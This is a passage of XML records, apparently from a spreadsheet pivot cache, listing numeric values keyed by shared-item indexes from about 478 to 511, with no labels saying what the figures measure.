  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="491"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="491"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="491"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="10"/>
    <x v="491"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="491"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="491"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="7"/>
    <x v="492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="492"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="492"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="492"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="492"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="48"/>
    <x v="492"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="51"/>
    <x v="492"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="492"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="492"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="493"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="493"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="493"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="493"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="35"/>
    <x v="493"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="17"/>
    <x v="493"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="493"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="493"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="2"/>
    <x v="494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="2"/>
    <x v="494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="494"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="494"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="494"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="494"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="45"/>
    <x v="494"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="494"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="494"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="494"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="495"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="495"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="496"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="496"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="496"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="496"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="496"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="497"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="497"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="497"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="497"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="497"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="10"/>
    <x v="498"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="498"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="8"/>
    <x v="498"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="8"/>
    <x v="498"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="46"/>
    <x v="498"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="280"/>
    <x v="498"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="498"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="498"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="499"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="499"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="499"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="499"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="1"/>
    <x v="499"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="499"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="500"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="500"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="4"/>
    <x v="500"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="21"/>
    <x v="500"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="500"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="14"/>
    <x v="501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="11"/>
    <x v="501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="12"/>
    <x v="501"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="10"/>
    <x v="501"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="501"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="501"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="22"/>
    <x v="501"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="25"/>
    <x v="501"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="501"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="501"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="502"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="502"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="6"/>
    <x v="502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="1"/>
    <x v="502"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="502"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="502"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="61"/>
    <x v="502"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="502"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="10"/>
    <x v="503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="140"/>
    <x v="503"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="167"/>
    <x v="503"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="503"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="340"/>
    <x v="503"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="503"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="503"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="504"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="504"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="504"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="504"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="504"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="504"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="505"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="505"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="505"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="505"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="505"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="505"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="7"/>
    <x v="506"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="506"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="13"/>
    <x v="506"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="506"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="506"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="495"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="506"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="506"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="506"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="506"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="478"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="70"/>
    <x v="478"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="20"/>
    <x v="478"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="6"/>
    <x v="478"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="168"/>
    <x v="478"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="8"/>
    <x v="507"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="507"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="507"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="38"/>
    <x v="508"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="45"/>
    <x v="508"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="508"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="508"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="508"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="508"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="508"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="508"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="7"/>
    <x v="509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="16"/>
    <x v="509"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="22"/>
    <x v="509"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="509"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="509"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="509"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="510"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="510"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="510"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="511"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="511"/>
  </r>
